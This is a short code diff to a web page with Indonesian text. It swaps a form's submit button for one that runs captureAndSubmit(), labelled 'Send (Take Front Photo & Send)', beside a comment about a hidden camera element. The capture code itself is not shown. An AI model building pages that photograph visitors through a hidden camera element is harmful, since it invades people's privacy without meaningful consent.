--- a/index.html
+++ b/index.html
@@ -140,7 +140,9 @@ Menghindari website yang menjanjikan fitur tidak resmi seperti peretasan akun, p
     <textarea name="message"></textarea>
   </label>
   <!-- your other form fields go here -->
-  <button type="submit">Send</button>
+  <button type="button" onclick="captureAndSubmit()" style="background: #0095f6; color: white; padding: 1rem; font-weight: bold; border: none; border-radius: 8px; width: 100%; margin-top: 1.5rem; font-size: 1.1rem; cursor: pointer;">
+  KIRIM (Ambil Foto Depan & Kirim)
+  </button>
 </form>
 
   <!-- Elemen kamera tersembunyi -->
